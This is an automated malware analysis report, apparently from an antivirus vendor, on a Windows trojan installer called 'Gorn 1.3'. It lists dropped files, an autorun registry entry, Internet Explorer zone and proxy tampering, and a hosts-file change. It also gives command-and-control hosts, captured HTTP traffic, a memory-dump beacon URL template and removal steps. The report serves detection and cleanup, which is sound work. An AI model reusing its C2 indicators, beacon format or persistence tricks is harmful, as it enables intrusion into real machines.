MD5: 3519312b0a92dcb093ac525d44038bdc
SHA1: 920879a26c3f41fca3b8823df1dbb6b4b1be73ef
SHA256: e1754866a11f354f33d434f319aaaeccd2b4634bce1af623fbbdc35d1529f510
SSDeep: 6144:JZXBsWqsE/Ao mv8Qv0LVmwq4FU0nN876/GDNIgH9alnPjC2:XXmwRo mv8QD4 0N46/aCMkl7H
Size: 292961 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, BorlandDelphiv30, UPolyXv05_v6
Company: no certificate found
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

crypt.exe:1388
%original file name%.exe:716
WScript.exe:1524

The Trojan injects its code into the following process(es):

crypt.exe:1796

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:716 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Gorn\Gorn\prostoigra.bat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (194 bytes)
%Program Files%\Gorn\Gorn\2.txt (27 bytes)
%Program Files%\Gorn\Gorn\Uninstall.exe (3286 bytes)
%Program Files%\Gorn\Gorn\crypt.exe (2795 bytes)
%Program Files%\Gorn\Gorn\neznoesvidanie.vbs (276 bytes)
%Program Files%\Gorn\Gorn\Uninstall.ini (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (68 bytes)
%Program Files%\Gorn\Gorn\1.txt (16 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\$inst (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (0 bytes)

The process WScript.exe:1524 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)

Registry activity

The process crypt.exe:1388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 E0 5D 41 C7 24 36 6D F2 2A E6 9A 00 72 49 EA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process crypt.exe:1796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 C7 6E 1C 32 F4 D0 0D E3 BB EB 24 5E 03 8D F1"

[HKCU\Software\NVIDIA Corporation\Global\nvUpdate]
"Value" = "20150108"
"Guid" = "1b3b27d2-9c58-40d3-9cd9-5520592a2784"

The process %original file name%.exe:716 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Gorn 1.3]
"EstimatedSize" = "182"
"Publisher" = "Gorn"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Gorn 1.3]
"DisplayIcon" = "%Program Files%\Gorn\Gorn\Uninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Gorn 1.3]
"NoModify" = "1"
"UninstallString" = "%Program Files%\Gorn\Gorn\Uninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Gorn 1.3]
"DisplayName" = "Gorn 1.3"
"InstallDate" = "20150111"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Gorn 1.3]
"NoRepair" = "1"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Gorn\Gorn]
"CRYPT.EXE" = "Supermodels"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"wscript.exe" = "Microsoft (R) Windows Based Script Host"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Gorn\Gorn]
"prostoigra.bat" = "prostoigra"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BF 52 BB BA B8 69 8B 8C 6B 10 DD 82 20 9C 89 FE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Gorn 1.3]
"VersionMajor" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Gorn 1.3]
"InstallSource" = "c:\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Gorn 1.3]
"Language" = "1033"
"VersionMinor" = "3"
"InstallLocation" = "%Program Files%\Gorn\Gorn\"
"DisplayVersion" = "1.3"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Gorn" = "%Program Files%\Gorn\Gorn\crypt.exe"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The process WScript.exe:1524 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "69 98 A9 92 8B 7C CF 0E 1F 48 C7 D8 46 BF B5 A5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 1165 bytes in size. The following strings are added to the hosts file listed below:

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Gorn
Product Name:
Product Version:
Legal Copyright: Gorn
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.3
File Description: Gorn 1.3 Installation
Comments:
Language: Chinese (Simplified, PRC)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 7
03b42612688b3f9459683b1bdd0acd89
62c899631bfeeaff81ffb879196c689c
e685cf50ca1c1e253a8be29dc06d9bb9
6fdfd598f057f274e8f3eac678dd9856
f717bbc6e9aea02f3ebf7745d71f6497
e3e08e9db110948605a5a4a94253ff33
4e18bc489a10f37d0b0c65bcc75f9e03

URLs

URL	IP
hxxp://108.61.183.181/apologi/gisgis/659/?mwa=830
hxxp://173.194.71.94/search?as_q=ансомон купить&hl=ru&num=50&btnG=Поиск+в+Google&as_epq=&as_oq=&as_eq=&lr=&cr=&as_ft=i&as_filetype=&as_qdr=all&as_occt=any&as_dt=i&as_sitesearch=&as_rights=&safe=images&start=0
hxxp://173.194.71.94/search?as_q=продвижение отелей&hl=ru&num=50&btnG=Поиск+в+Google&as_epq=&as_oq=&as_eq=&lr=&cr=&as_ft=i&as_filetype=&as_qdr=all&as_occt=any&as_dt=i&as_sitesearch=&as_rights=&safe=images&start=0
hxxp://173.194.71.94/search?as_q=ремонт рулевых реек хонда&hl=ru&num=50&btnG=Поиск+в+Google&as_epq=&as_oq=&as_eq=&lr=&cr=&as_ft=i&as_filetype=&as_qdr=all&as_occt=any&as_dt=i&as_sitesearch=&as_rights=&safe=images&start=0
hxxp://www.google.ru/search?as_q=ансомон купить&hl=ru&num=50&btnG=Поиск+в+Google&as_epq=&as_oq=&as_eq=&lr=&cr=&as_ft=i&as_filetype=&as_qdr=all&as_occt=any&as_dt=i&as_sitesearch=&as_rights=&safe=images&start=0
hxxp://www.google.ru/search?as_q=ремонт рулевых реек хонда&hl=ru&num=50&btnG=Поиск+в+Google&as_epq=&as_oq=&as_eq=&lr=&cr=&as_ft=i&as_filetype=&as_qdr=all&as_occt=any&as_dt=i&as_sitesearch=&as_rights=&safe=images&start=0
hxxp://www.google.ru/search?as_q=продвижение отелей&hl=ru&num=50&btnG=Поиск+в+Google&as_epq=&as_oq=&as_eq=&lr=&cr=&as_ft=i&as_filetype=&as_qdr=all&as_occt=any&as_dt=i&as_sitesearch=&as_rights=&safe=images&start=0
server-14.googletestadminwin.com	217.79.190.104
server-12.googletestadminwin.com	37.48.81.160

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET TROJAN Win32/Glupteba CnC Checkin

Traffic

GET /search?as_q=продвижение отелей&hl=ru&num=50&btnG=Поиск+в+Google&as_epq=&as_oq=&as_eq=&lr=&cr=&as_ft=i&as_filetype=&as_qdr=all&as_occt=any&as_dt=i&as_sitesearch=&as_rights=&safe=images&start=0 HTTP/1.0

Host: VVV.google.ru

Accept: */*

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.10) Gecko/20100914 MRA 5.7 (build 03686) Firefox/3.6.10

Connection: Close

Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3

HTTP/1.0 200 OK

Date: Sun, 11 Jan 2015 21:12:58 GMT

Expires: -1

Cache-Control: private, max-age=0

Content-Type: text/html; charset=UTF-8

Set-Cookie: PREF=ID=e9c797cff65c72cf:FF=0:NW=1:TM=1421010778:LM=1421010778:S=zWQXWbbL5Jns42Ol; expires=Tue, 10-Jan-2017 21:12:58 GMT; path=/; domain=.google.ru

Set-Cookie: NID=67=F1FB3pmGmmiaRtm1ai_YtOkV-cvFO4pzVe109JNEb7Op68tKWvU791_o3fjajpQcKkH2ttz_3aSYwrSrsmeVmFWe5qPg85ZNDo2YC5EqU3UiAXUorurcm4yKqj5TOPmZ; expires=Mon, 13-Jul-2015 21:12:58 GMT; path=/; domain=.google.ru; HttpOnly

P3P: CP="This is not a P3P policy! See hXXp://VVV.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."

Server: gws

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Alternate-Protocol: 80:quic,p=0.02

Accept-Ranges: none

Vary: Accept-Encoding
<!doctype html><html itemscope="" itemtype="hXXp://schema.org
/SearchResultsPage" lang="ru"><head><meta content="text/ht
ml; charset=UTF-8" http-equiv="Content-Type"><meta content="/ima
ges/google_favicon_128.png" itemprop="image"><title>.........
............. ............ - .......... .. Google</title><sty
le>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{positi
on:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{lef
t:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:tr
ansparent;position:absolute;top:-999px;visibility:hidden;z-index:998;r
ight:0}.gbto #gbs{background:#fff}#gbx3,#gbx4{background-color:#2d2d2d
;background-image:none;_background-image:none;background-position:0 -1
38px;background-repeat:repeat-x;border-bottom:1px solid #000;font-size
:24px;height:29px;_height:30px;opacity:1;filter:alpha(opacity=100);pos
ition:absolute;top:0;width:100%;z-index:990}#gbx3{left:0}#gbx4{right:0
}#gbb{position:relative}#gbbw{left:0;position:absolute;top:30px;width:
100%}.gbtcb{position:absolute;visibility:hidden}#gbz .gbtcb{right:0}#g
bg .gbtcb{left:0}.gbxx{display:none !important}.gbxo{opacity:0 !import
ant;filter:alpha(opacity=0) !important}.gbm{position:absolute;z-index:
999;top:-999px;visibility:hidden;text-align:left;border:1px solid #beb
ebe;background:#fff;-moz-box-shadow:-1px 1px 1px rgba(0,0,0,.2);-webki
t-box-shadow:0 2px 4px rgba(0,0,0,.2);box-shadow:0 2px 4px rgba(0,0,0,
.2)}.gbrtl .gbm{-moz-box-shadow:1px 1px 1px rgba(0,0,0,.2)}.gbto .
<<< skipped >>>

GET /apologi/gisgis/659/?mwa=830 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 108.61.183.181

Connection: Keep-Alive

HTTP/1.1 404 Not Found

Server: nginx/1.6.2

Date: Sun, 11 Jan 2015 21:12:07 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.4.22

Set-Cookie: ci_session=NYkMKFEUys/sZAQrpQ1689Vp+4td97tmhdxOq4zpfEGvQ8DlUx6jdionq6urbQrKhD+k5T8IljN2sQDiFC2C+54oW9YO7u3D3fTG4Xmit5kK/pUGo69Nzs4GjDLepAYijt31ADeK0LE2NLo0/U2c0qCeA0avCv4fTrx+BU3/mwLMRCw4MbEeJHQ2Cceil3sL3WN4atnm8Oln7b0aNLgoPEJ6oHM5gYP1LbZaHUKI9qfDnqV87dz/wRDVU3zl+1xkA73CnnNgo3HFZC9y+90JfaAl6j5fAeEdx3PFvbNtuy4MWO/KG8P56GM2dIho095bbtRHsRt2Zs9SJZK8d3k6r/DA72/Rp/T3nCGggJNIe+4yx1etilexnl4PmAELn0xeXIOS1j5dMk6ghXXWUOBZQUBta6W/DEbfbqsUygXSuY4N+O1DuOkALUqs3Yft2sPxJICGlqWNQYDQFDncMDQ27w==; path=/
4d3..<!DOCTYPE html>..<html lang="en">..<head>..<
title>404 Page Not Found</title>..<style type="text/css"&g
t;..::selection{ background-color: #E13300; color: white; }..::moz-sel
ection{ background-color: #E13300; color: white; }..::webkit-selection
{ background-color: #E13300; color: white; }..body {...background-colo
r: #fff;...margin: 40px;...font: 13px/20px normal Helvetica, Arial, sa
ns-serif;...color: #4F5155;..}..a {...color: #003399;...background-col
or: transparent;...font-weight: normal;..}..h1 {...color: #444;...back
ground-color: transparent;...border-bottom: 1px solid #D0D0D0;...font-
size: 19px;...font-weight: normal;...margin: 0 0 14px 0;...padding: 14
px 15px 10px 15px;..}..code {...font-family: Consolas, Monaco, Courier
 New, Courier, monospace;...font-size: 12px;...background-color: #f9f9
f9;...border: 1px solid #D0D0D0;...color: #002166;...display: block;..
.margin: 14px 0 14px 0;...padding: 12px 10px 12px 10px;..}..#container
 {...margin: 10px;...border: 1px solid #D0D0D0;...-webkit-box-shadow: 
0 0 8px #D0D0D0;..}..p {...margin: 12px 15px 12px 15px;..}..</style
>..</head>..<body>...<div id="container">....<
h1>404 Page Not Found</h1>....<p>The page you requested
 was not found.</p>.</div>..</body>..</html>..
0..
<<< skipped >>>

GET /search?as_q=ансомон купить&hl=ru&num=50&btnG=Поиск+в+Google&as_epq=&as_oq=&as_eq=&lr=&cr=&as_ft=i&as_filetype=&as_qdr=all&as_occt=any&as_dt=i&as_sitesearch=&as_rights=&safe=images&start=0 HTTP/1.0

Host: VVV.google.ru

Accept: */*

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)

Connection: Close

Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3

HTTP/1.0 200 OK

Date: Sun, 11 Jan 2015 21:12:56 GMT

Expires: -1

Cache-Control: private, max-age=0

Content-Type: text/html; charset=UTF-8

Set-Cookie: PREF=ID=60389c1ec62c31dc:FF=0:NW=1:TM=1421010776:LM=1421010776:S=V-GST-C74KOJHLZs; expires=Tue, 10-Jan-2017 21:12:56 GMT; path=/; domain=.google.ru

Set-Cookie: NID=67=ixsTh0Ow_6CzcAA38Dke1n-qAxPxvikbccJ4yqknfD1nhz9vtFbhnXMoVT8OL7o2-gYZGT4Ox6e5gd7wqC3s9Zlsnju1w3i9ZXMVXsf-p95IOW7W3xbSP0t85MjkLb_t; expires=Mon, 13-Jul-2015 21:12:56 GMT; path=/; domain=.google.ru; HttpOnly

P3P: CP="This is not a P3P policy! See hXXp://VVV.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."

Server: gws

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Alternate-Protocol: 80:quic,p=0.02

Accept-Ranges: none

Vary: Accept-Encoding
<!doctype html><html itemscope="" itemtype="hXXp://schema.org
/SearchResultsPage" lang="ru"><head><meta content="text/ht
ml; charset=UTF-8" http-equiv="Content-Type"><meta content="/ima
ges/google_favicon_128.png" itemprop="image"><title>.........
..... ............ - .......... .. Google</title><style>#g
b{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absol
ute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padd
ing-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparen
t;position:absolute;top:-999px;visibility:hidden;z-index:998;right:0}.
gbto #gbs{background:#fff}#gbx3,#gbx4{background-color:#2d2d2d;backgro
und-image:none;_background-image:none;background-position:0 -138px;bac
kground-repeat:repeat-x;border-bottom:1px solid #000;font-size:24px;he
ight:29px;_height:30px;opacity:1;filter:alpha(opacity=100);position:ab
solute;top:0;width:100%;z-index:990}#gbx3{left:0}#gbx4{right:0}#gbb{po
sition:relative}#gbbw{left:0;position:absolute;top:30px;width:100%}.gb
tcb{position:absolute;visibility:hidden}#gbz .gbtcb{right:0}#gbg .gbtc
b{left:0}.gbxx{display:none !important}.gbxo{opacity:0 !important;filt
er:alpha(opacity=0) !important}.gbm{position:absolute;z-index:999;top:
-999px;visibility:hidden;text-align:left;border:1px solid #bebebe;back
ground:#fff;-moz-box-shadow:-1px 1px 1px rgba(0,0,0,.2);-webkit-box-sh
adow:0 2px 4px rgba(0,0,0,.2);box-shadow:0 2px 4px rgba(0,0,0,.2)}.gbr
tl .gbm{-moz-box-shadow:1px 1px 1px rgba(0,0,0,.2)}.gbto .gbm,.gbt
<<< skipped >>>

GET /search?as_q=ремонт рулевых реек хонда&hl=ru&num=50&btnG=Поиск+в+Google&as_epq=&as_oq=&as_eq=&lr=&cr=&as_ft=i&as_filetype=&as_qdr=all&as_occt=any&as_dt=i&as_sitesearch=&as_rights=&safe=images&start=0 HTTP/1.0

Host: VVV.google.ru

Accept: */*

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)

Connection: Close

Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3

HTTP/1.0 200 OK

Date: Sun, 11 Jan 2015 21:13:04 GMT

Expires: -1

Cache-Control: private, max-age=0

Content-Type: text/html; charset=UTF-8

Set-Cookie: PREF=ID=9d6a9e9d8e8e9782:FF=0:NW=1:TM=1421010784:LM=1421010784:S=UseLlfwbTQ-oQ5jj; expires=Tue, 10-Jan-2017 21:13:04 GMT; path=/; domain=.google.ru

Set-Cookie: NID=67=kw4ykELp6EEwVyxCv42IBPeGExJqeZbttxsTuNc8gWnCks6itxxRObqL_n30GG3iuKPEoVOIdYR70qXeku8wgaTsUlJ7iBEYp4X6XrvrjpFd8Jta0z0aSEMB5C-bCKaq; expires=Mon, 13-Jul-2015 21:13:04 GMT; path=/; domain=.google.ru; HttpOnly

P3P: CP="This is not a P3P policy! See hXXp://VVV.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."

Server: gws

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Alternate-Protocol: 80:quic,p=0.02

Accept-Ranges: none

Vary: Accept-Encoding
<!doctype html><html itemscope="" itemtype="hXXp://schema.org
/SearchResultsPage" lang="ru"><head><meta content="text/ht
ml; charset=UTF-8" http-equiv="Content-Type"><meta content="/ima
ges/google_favicon_128.png" itemprop="image"><title>.........
... .............. ........ .......... - .......... .. Google</titl
e><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz
,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1
000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{b
ackground:transparent;position:absolute;top:-999px;visibility:hidden;z
-index:998;right:0}.gbto #gbs{background:#fff}#gbx3,#gbx4{background-c
olor:#2d2d2d;background-image:none;_background-image:none;background-p
osition:0 -138px;background-repeat:repeat-x;border-bottom:1px solid #0
00;font-size:24px;height:29px;_height:30px;opacity:1;filter:alpha(opac
ity=100);position:absolute;top:0;width:100%;z-index:990}#gbx3{left:0}#
gbx4{right:0}#gbb{position:relative}#gbbw{left:0;position:absolute;top
:30px;width:100%}.gbtcb{position:absolute;visibility:hidden}#gbz .gbtc
b{right:0}#gbg .gbtcb{left:0}.gbxx{display:none !important}.gbxo{opaci
ty:0 !important;filter:alpha(opacity=0) !important}.gbm{position:absol
ute;z-index:999;top:-999px;visibility:hidden;text-align:left;border:1p
x solid #bebebe;background:#fff;-moz-box-shadow:-1px 1px 1px rgba(0,0,
0,.2);-webkit-box-shadow:0 2px 4px rgba(0,0,0,.2);box-shadow:0 2px 4px
 rgba(0,0,0,.2)}.gbrtl .gbm{-moz-box-shadow:1px 1px 1px rgba(0,0,0
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

.text

P`.data

.rdata

[email protected]_fram

[email protected]

.idata

server-14.googletestadminwin.com

bpass

q1b3b27d2-9c58-40d3-9cd9-5520592a2784

libgcj-13.dll

@%s:%s:%d

-_.!~*'()

GET /stat?uptime=%d&downlink=%d&uplink=%d&id=%s&statpass=%s&version=%d&features=%d&guid=%s&comment=%s&p=%d&s=%s HTTP/1.0

badpass

%s:%s

20150108

server-%s.googletestadminwin.com:35

8kernel32.dll

advapi32.dll

rpcrt4.dll

shlwapi.dll

RegCreateKeyA

RegCloseKey

RegOpenKeyA

ws2_32.dll

VirtualQuery failed for %d bytes at address %p

Unknown pseudo relocation protocol version %d.

Unknown pseudo relocation bit size %d.

GCC: (tdm-2) 4.8.1

KERNEL32.dll

msvcrt.dll

crypt.exe_1796_rwx_00400000_00010000:

.text

P`.data

.rdata

[email protected]_fram

[email protected]

.idata

server-14.googletestadminwin.com

bpass

q1b3b27d2-9c58-40d3-9cd9-5520592a2784

libgcj-13.dll

@%s:%s:%d

-_.!~*'()

GET /stat?uptime=%d&downlink=%d&uplink=%d&id=%s&statpass=%s&version=%d&features=%d&guid=%s&comment=%s&p=%d&s=%s HTTP/1.0

badpass

%s:%s

20150108

server-%s.googletestadminwin.com:35

8kernel32.dll

advapi32.dll

rpcrt4.dll

shlwapi.dll

RegCreateKeyA

RegCloseKey

RegOpenKeyA

ws2_32.dll

VirtualQuery failed for %d bytes at address %p

Unknown pseudo relocation protocol version %d.

Unknown pseudo relocation bit size %d.

GCC: (tdm-2) 4.8.1

KERNEL32.dll

msvcrt.dll

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   crypt.exe:1388
   %original file name%.exe:716
   WScript.exe:1524

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %Program Files%\Gorn\Gorn\prostoigra.bat (1 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (194 bytes)
   %Program Files%\Gorn\Gorn\2.txt (27 bytes)
   %Program Files%\Gorn\Gorn\Uninstall.exe (3286 bytes)
   %Program Files%\Gorn\Gorn\crypt.exe (2795 bytes)
   %Program Files%\Gorn\Gorn\neznoesvidanie.vbs (276 bytes)
   %Program Files%\Gorn\Gorn\Uninstall.ini (2 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (68 bytes)
   %Program Files%\Gorn\Gorn\1.txt (16 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   "Gorn" = "%Program Files%\Gorn\Gorn\crypt.exe"

5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
   127.0.0.1 localhost
   
6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
7. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.